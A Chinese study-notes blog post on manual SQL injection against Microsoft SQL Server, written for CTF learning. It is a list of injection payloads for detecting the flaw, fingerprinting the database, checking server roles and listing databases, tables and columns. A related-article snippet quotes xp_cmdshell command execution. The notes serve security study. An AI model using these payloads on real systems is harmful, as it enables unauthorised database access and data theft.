SQL server手工注入学习笔记

最新推荐文章于 2024-09-11 14:46:50 发布
最新推荐文章于 2024-09-11 14:46:50 发布
阅读量8.5k 收藏 17
点赞数 2
分类专栏: CTF学习 文章标签: sql server SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_32360995/article/details/71316949
版权

                              MSSQL注入(SQL server)

由于这学期正在学数据库,所以理解SQL语句还是可疑的大笑。看完视频后自己动手实践顺便整理了学习笔记,有些来自视频有些来自其他大佬的博客。


一:判断是否有注入

and 1=1

and 1=2

判断注入的方法是一样的

二:初步判断是否是MSSQL

and user>0

三:判断数据库系统

and (select count(*) from sysobjects) >0       MSSQL

and (select count(*) from msysobjects) >0       ACCESS

四:注入参数是字符

‘and [查询条件] and‘’=’

五:搜索时没过滤参数的

‘and [查询条件] and‘%25=’

六:猜表名

and (select Count(*) from [表名])>0

七:猜字段

and (select Count(字段名) from表名)>0

八:猜字段中记录长度

and (select top 1 len(字段名) from表名)>0

九:猜字段的ascii

1、ACCESS

and (select top 1 asc(mid(字段名,1,1)) from表名)>0

2、MSSQL

and (select top 1 unicode(substring(字段名,1,1)) from表名)>0

十:测试权限结构

and 1=(select is_srvrolemember('sysadmin'))--

and 1=(select is_srvrolemember('serveradmin'))--

and 1=(select is_srvrolemember('setupadmin'))--

and 1=(select is_srvrolemember('securityadmin'))--

and 1=(select is_srvrolemember('diskadmin'))--

and 1=(select is_srvrolemember('bulkadmin'))--

and 1=(select is_member('db_owner'))--

十一:番外

1、爆版本         and @@version>0

2、爆数据库名     and db_name()>0

3、爆当前用户名   and User_Name()>0

4、爆其他数据库   and (SELECT top 1 Name FROM Master..SysDatabases)>0

再爆其他数据库    and (SELECT top 1 Name FROM Master..SysDatabases where name not in ('数据库1'))>0

再继续            and (SELECT top 1 Name FROM Master..SysDatabases where name not in ('数据库1','数据库2'))>0

5、爆表           and (select top 1 name from [数据库名字].sys.all_objects where type='U' AND is_ms_shipped=0)>0

再爆表            and (select top 1 name from[数据库名字].sys.all_objects where type='U' AND is_ms_shipped=0 and name not in ('第一个表名'))>0

再继续,同理...

6、爆字段         and (select top 1 COLUMN_NAME from[数据库名字].information_schema.columns where TABLE_NAME='表名')>0

再爆其他字段      and (select top 1 COLUMN_NAME from[数据库名字].information_schema.columns where TABLE_NAME='表名' and COLUMN_NAME not in ('第一个字段名'))>0

再继续,同理...

临渊行
关注
专栏目录
SQL server注入
weixin_45958861的博客
09-20 1606
较为复杂 一般不用手工 用工具 1.注入语句 ①*判断数据库类型 and exists (select * from sysobjects)–返回正常为mssql(也名sql server) and exists (select count() from sysobjects)–有时上面那个语句不行就试试这个哈 ②判断数据库版本 and 1=@@version–这个语句要在有回显的模式下才可以哦 and substring((select @@version),22,4)=‘2008’–适用
SQL server手工注入入门
无心的博客
10-27 2701
目录 0x01 SQL server基础 0x02 基本注入 SQL server部分版本已被黑客安装后门,详情请在文末查看。 0x01 SQL server基础 在学习注入之前,最重要的是要先了解SQL server的具体的东西,才能更好的进行注入操作 系统库 master master数据库控制SQLserver的所有方面,这个数据库中包含所有的配置信息、用户登陆信息、当前正在服务器运行...
SQL Server 全部笔记
weixin_33834075的博客
04-11 460
                                一、基础 1、创建数据库   create database database-name2、删除数据库   drop database dbname3、备份sql server      ---创建 备份数据的device      USE master      EXEC sp_addumpdevice ...
玩转SQL注入,想零基础入门到精通(超详细),收藏这一篇就够了
最新发布
Cairo_A的博客
09-11 1376
玩转SQL注入,想零基础入门到精通(超详细),收藏这一篇就够了
sql注入语句大全
weixin_34239169的博客
03-31 360
sql注入语句大全 --是否存在xp_cmdshell and 1=(select count(*) from master.dbo.sysobjects where xtype = 'x' and name = 'xp_cmdshell') --用xp_cmdshell执行命令 ;exec master..xp_cmdshell "net user name passwo...
桂林老兵的SQLSERVER高级注入技巧
12-13 1101
现在将老兵本人多年的SQLSERVER注入高级技巧奉献给支持老兵的朋友:前言:即是高级技巧,其它基本的注入方法就不详述了。看不懂可查本站的注入基础文章。为了更好的用好注入,建议大家看看本站的SQL语法相关文章[获取全部数据库名]select name from master.dbo.sysdatabases where dbid=7 //dbid的值为7以上都是用户数据库[获得数据表名][将字段值
SQL Server 注入
mingyqf的博客
03-22 2506
SQL Server 注入 (转至:https://www.1024sou.com/article/798425.html) 侵删 一、简介 SQL Server数据库是由Microsoft开发和推广的关系数据库管理系统(DBMS),是一个比较大型的数据库。端口号为1433。数据库后缀名 .mdf,注释符是 – sa权限:数据库操作,文件管理,命令执行,注册表读取等 (数据库最高权限system) db权限:文件管理,数据库操作等权限 users-administrators **public权限:**数
SQL注入学习笔记
lyhxww的博客
02-27 275
第一节: 学习对象:信息安全技术初学者 学习方法: 1、学习并掌握常见的数据库命令、语法 2、掌握HTTP协议中常见的请求方法及参数含义 3、要灵活地运用手工注入和工具辅助注入 4、掌握SQL注入的不同注入方式 用户在上网时查看一个网站时 通过客户端进行请求->脚本引擎构造语句向数据库发起请求->数据库查询记录->将查询到的记录返回给脚本引擎->客户端就能查看到相应信息 [...
MSSQL手工注入实战:SQL注入漏洞探索
"SQL注入之MSSQL注入MSSQL手工注入" 本文主要探讨了SQL注入攻击中的MSSQL注入,特别是在Windows Server 2008 R2环境下使用IIS搭建的MSSQL-SQLi-Labs第一关的实战演练。作者以学习笔记的形式,详细介绍了如何识别和...
CTF学习笔记——sql注入(2)
Obs_cure的博客
08-16 625
一、[SUCTF 2019]EasySQL 看标题就知道是关于sql注入的题目。老规矩,先跑一下sqlmap,再用1’ or 1=1 #试试。 全部木大了…看writeup吧…
[红日安全]学习笔记1—SQL注入实战攻防(SQLMap、DVWA、Pikachu)
ISNS的博客
04-21 1593
最近和同学聊天: 是我太菜。
SQL_Server学习笔记
04-02
关于SQL学习笔记,可以在有SQL基础之上,平时学习或者工作开发时当做查阅资料
SQL-Server笔记
tan_tantan123456的博客
10-13 994
触发器是SQL server提供给程序员和数据分析员来保证数据完整性的一种方法,它是与表事件相关的特殊的存储过程,它的执行insert、delete、和update时就会激活它执行。自动提交事务:是SQL server默认的事务模式,将每个T-SQL语句都视为一个事务,如果成功执行,则自动提交,如果出现错误,则自动回滚事务。一、子查询是一个嵌套在select、insert、update和delete语句或其他子查询中的查询,任何允许使用表达式的地方均可使用子查询,但子查询通常位于where子句中。
sqlServer笔记
不是我的博客
09-13 702
create  trigger  触发器名 on  表 | 视图 for  insert      --for表示在插入时,还有after,表示在插入后 as  updata  表2  set  列=列+1 where  列=(select  列  from  inserted)    //inserted  是触发器(数据库)自动维护的插入的那条临时信息
sql server 笔记
brave_ji的博客
09-27 262
最基本的SQL查询语句:  select (table fields list)表的字段列表  from (table names list)表名称列表  where (row constraints specification)行约束规范  group by (grouping specification)分组规范  having (grouping selection specifi
SQL Server笔记
weixin_42219796的博客
03-04 554
sql server的基本操作
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值